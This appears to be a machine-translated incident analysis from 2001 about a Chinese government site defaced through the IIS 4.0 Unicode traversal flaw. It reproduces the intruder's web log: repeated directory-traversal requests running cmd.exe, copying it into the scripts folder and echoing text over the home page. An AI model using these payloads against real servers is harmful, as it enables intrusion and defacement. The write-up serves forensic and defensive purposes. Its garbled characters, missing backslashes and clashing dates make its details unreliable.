Author: Zhu Xiaoying
I am a security engineer of the company. Recently, the American hackers launched an attack on my country's government websites, which was fierce, and our company's security emergency response center has received 7 or 8 such cases.
According to our invasion process of these cases, it is found that American hackers did not adopt a very high-minded means, and most of them were the weakness of the wealth, and they were looking for a small website to attack, which used several harmful Safety vulnerabilities, one of the following examples are common on many websites in my country. I hope that your network will appreciate the invasive cases like this through the Internet media, causing everyone's alert and take practical measures to protect. I hope that the Internet media is not only hot in the report of the attack, but also put some focuses on security protection, so that there is both news value and help readers. Thank you!
Invasation analysis of www.xxxx.xxx.cn
One: Event background
The website of Guangdong C-office is www.xxx.com.cn (IP: 61.xxx.xxx.17) is a hacker malicious attack during April 2001, resulting in a website web page to be modified. In this case, Shenzhen An Lu Technology Co., Ltd. was commissioned by a city S-Board on April 17, 2001, and went to the computer room on-site forensics.
2: The basic situation of the server and the information that has been obtained, the server operating system is Windows NT Server 4.0, which is installed with IIS 4.0, and uses firewall mask, only open Web services. Our technicians are collecting MS IIS 4.0 from April 13 to April 17, Apr 2, HTTPLOG and FTPLOG.
Three: Analysis
Since the station is modified for the web page after being invasive. And the station is subject to PIX Firewall defense, only open 80 ports, so preliminary estimation is to obtain system control through IIS remote vulnerability, IIS 4.0 default ISM.DLL , Msadcs.dll, Unicode, etc. Remote Vulnerabilities for web modification permissions. So the technical staff of our company conducted detailed analysis and filtration of the server's MS IIS 4.0 from August 17 to April 17, 2001, to draw the following conclusions:
Intruders use the Unicode vulnerability, so that you can use the Web port to submit a request to execute the command, modify the website home page.
Note: For details, please see: http://www.cnns.net/article/db/822.htm
The changed page is as follows:
The following is an intruder's intrusion record:
1: intruder IP 2: Date 3: Time 4: Usage 5: Access URL
6 server return number
If the server returns 200, the intruder successfully implemented the command using the Unicode vulnerability.
1 2 3 4 56
152.158.208.65 01-4-17 4:34:19 get / scripts / .. 鼆 €€€€?. / Winnt / System32 / cmd.exe, / C Dir C: 500
152.158.208.65 01-4-17 4:34:19 get /scripts/..?../winnt/system32/cmd.exe, / c DIR C: 500
152.158.208.65 01-4-17 4:34:19 get /scripts/../../winnt/system32/cmd.exe, / c DIR C: 200
152.158.208.65 01-4-17 4:34:19 get /_vti_bin/../../..../..../../winnt/system32/cmd.exe, / c DIR C: 200
152.158.208.65 01-4-17 4:34:19 get /scripts/.../winnt/system32/cmd.exe, / c DIR C: 200
152.158.208.65 01-4-17 4:34:21 get /scripts/.../winnt/system32/cmd.exe, / c dir c: 200152.158.208.65 01-4-17 4:34:21 Get /scripts/../../winnt/system32/cmd.exe, / c DIR C: 200
152.158.208.65 01-4-17 4:34:21 get /scripts/../../winnt/system32/cmd.exe, / c DIR C: 200
152.158.208.65 01-4-17 4:34:21 get /_vti_bin/../winnt/system32/cmd.exe, / c DIR C: 200
152.158.208.65 01-4-17 4:34:23 get /scripts/.../winnt/system32/cmd.exe, / c DIR C: 200
152.158.208.65 01-4-17 4:34:23 get /scripts/../../winnt/system32/cmd.exe, / c DIR C: 200
152.158.208.65 01-4-17 4:34:23 get / scripts / .. 饊 € ?/ Winnt / System32 / cmd.exe, / C DIR C: 500
152.158.208.65 01-4-17 4:34:23 get / msadc/../../..../../../winnt/system32/cmd.exe, / c dir C: 200
152.158.208.65 01-4-17 4:34:25 get /scripts/..o../winnt/system32/cmd.exe, / c DIR C: 404
152.158.208.65 01-4-17 4:34:25 get /scripts/..?../..........MSSQL7/INSTALL/PubText.bat" & dir c: 403
152.158.208.65 01-4-17 4:34:25 get / scripts / .. 鴢 €€? ./ Winnt / System32 / cmd.exe, / C DIR C: 500
152.158.208.65 01-4-17 4:34:25 get / 鄝 ?/ Winnt / System32 / cmd.exe, / C DIR C: 404
152.158.208.65 01-4-17 5:21:17 get /scripts/.../winnt/system32/cmd.exe, / c set 502
152.158.208.65 01-4-17 5:21:37 get /scripts/.../winnt/system32/cmd.exe,
/c copy c:winntsystem32cmd.exe c:inetpubscripts1.exe 502
152.158.208.65 01-4-17 5:24:32 get /scripts/..../inetpub/scripts/1.exe, / c DIR C: 200
152.158.208.65 01-4-17 5:24:38 get /scripts/..../inetpub/scripts/1.exe, / c set 502
152.158.208.65 01-4-17 5:24:49 get /scripts/..../inetpub/scripts/1.exe,
/ C DIR C: INETPubwwwrootfastinfo 200
152.158.208.65 01-4-17 5:25:10 get /scripts/.../inetpub/scripts/1.exe ,/c echo rtyc:NetpubwwwrootfastinfoIndex.asp 502
152.158.208.65 01-4-17 5:25:19 Get /index.asp 200
152.158.208.65 01-4-17 5:25:37 get /scripts/..../inetpub/scripts/1.exe, 502
/c echo ^^join us: poizonb0x@linuxmail.org ^^^^^^^^^^^^^^^^^^ ^^ ^^^ Pix, ^^^> C: inetpubwwwrootfastinf
OINDEX.ASP 502
152.158.208.65 01-4-17 5:25:43 Get /index.asp 200
From the above analysis, we can clearly see the intruder from the same IP on April 17, 2001, trying to use the Unicode vulnerability remote execution command to achieve the purpose of modifying the web page.
The attack time is: April 17, 2001 4: 34: 19 - April 17, 2001 5:25:43
The intruder IP address is: 152.158.208.65 from the United States
Four: Conclusion
Intruders use the Unicode remote vulnerability to get system control, multiple remote execution commands, after understanding the server structure, modify the home page.
Lock IP is: 152.158.208.65 from the United States
The attack time is: April 17, 2001 4: 34: 19 - April 17, 2001 5:25:43
The intruder physical address is the United States